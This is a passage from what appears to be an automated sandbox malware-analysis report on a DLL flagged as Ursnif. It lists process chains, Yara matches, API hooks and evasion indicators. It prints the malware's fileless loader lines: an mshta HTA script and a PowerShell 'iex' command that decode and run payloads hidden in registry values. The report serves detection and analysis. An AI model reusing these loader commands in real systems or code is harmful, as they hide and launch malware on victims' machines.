Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Uses 32bit PE files

Source: 2770174.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: 2770174.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winDLL@46/226@59/18

Contains functionality to enum processes or threads

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0140A65C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_0140A65C

Creates files inside the user directory

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{44121266-DEA1-11EB-90E5-ECF4BB570DC9}.dat

Jump to behavior

Creates mutexes

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_01

Creates temporary files

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF2F2063E2C0FD540B.TMP

Jump to behavior

PE file has an executable .text section and no other executable section

Source: 2770174.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Reads ini files

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Runs a DLL by calling functions

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2770174.dll',#1

Spawns processes

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2770174.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2770174.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2770174.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2770174.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2770174.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17428 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17432 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:82960 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17442 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17454 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:82990 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:148488 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83022 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17508 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pyhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pyhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83042 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17518 /prefetch:2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17528 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83060 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2770174.dll',#1			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2770174.dll			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2770174.dll,DllRegisterServer			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2770174.dll',#1			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17410 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17428 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17432 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:82960 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17442 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17454 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:82990 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17474 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17432 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:148488 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83022 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17508 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83042 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17518 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17528 /prefetch:2			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83060 /prefetch:2			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))

Uses an in-process (OLE) Automation server

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Reads internet explorer settings

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Data Obfuscation:

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001BAC LoadLibraryA,GetProcAddress,

0_2_10001BAC

Registers a DLL

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2770174.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002120 push ecx; ret		0_2_10002129
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002173 push ecx; ret		0_2_10002183
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0140AF6F push ecx; ret		0_2_0140AF7F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0140ABC0 push ecx; ret		0_2_0140ABC9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0140D2A8 pushad ; iretd		0_2_0140D2B1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0140D2AC pushad ; iretd		0_2_0140D2B1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0140D2B0 pushad ; iretd		0_2_0140D2B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F0ABC0 push ecx; ret		2_2_00F0ABC9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F0AF6F push ecx; ret		2_2_00F0AF7F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463AF6F push ecx; ret		3_2_0463AF7F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463ABC0 push ecx; ret		3_2_0463ABC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0418AF6F push ecx; ret		5_2_0418AF7F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0418ABC0 push ecx; ret		5_2_0418ABC9

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.452621123.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340867138.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358484652.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452413152.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.476285292.0000000004F6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358574602.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.341005235.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452703813.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358543809.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358526121.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358423422.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358490581.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.341021111.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358326330.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340830267.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452659371.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358587293.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340789162.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358440799.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340944106.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358282465.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358549744.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452359075.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358639536.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452511017.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.478007505.000000000492C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.450359527.000000000507C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340988909.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358200334.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452558605.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358380196.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452589252.0000000002508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.358524105.0000000004B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.358621357.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.340893376.0000000005278000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5288, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5292, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5324, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5276, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Disables application error messsages (SetErrorMode)

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
